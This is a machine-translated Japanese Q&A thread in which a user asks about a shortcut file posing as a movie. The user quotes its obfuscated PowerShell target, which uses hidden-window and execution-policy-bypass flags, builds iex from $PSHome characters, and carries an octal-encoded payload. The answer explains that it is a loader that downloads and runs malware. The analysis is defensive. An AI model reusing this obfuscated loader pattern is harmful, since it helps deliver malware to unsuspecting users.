web-dev-qa-db-ja.com

このリンクは具体的に何をするのですか、それともウイルスですか?

Windows 10で、映画だと思ったこのファイルをダウンロードしましたが、サイズが700MBのショートカットでした

ターゲットはこれだ

C:\ Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEcByP。 ($ pshOmE [4] + $ PShoMe [30] + 'X')(-JoiN((44、141、163,160、170、40、75、40、50,50、116、145、167,55、117、 142、152、145、143、164、40、123、171、163、164、145、155、56、116

そして、それは

%SYSTEMROOT%\ System32\WindowsPowerShell\v1.0

それは何をするためのものか?

6
Erik

マルウェアローダーです。

New-Object System.N...(数字で隠されている)で始まるPowerShellコードを実行します。これは、完全なコンテンツではNew-Object System.Net.WebClientであり、さらに、に隠されているURLから実際のマルウェアをダウンロードして実行するために使用されます。難読化されたコードの追加番号。

すでにリンクをクリックしている場合は、URLがすでに削除されていない限り、すでに感染している可能性があります。

行をメモ帳に貼り付けてから、( -JoiN( (の前のすべてを削除し、残りの部分(( -JoiN( (...で始まる)をコピーしてPowerShellウィンドウに貼り付けることができます。通常、前の$pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression によって実行される難読化されたPowerShellコードが開示されます。

8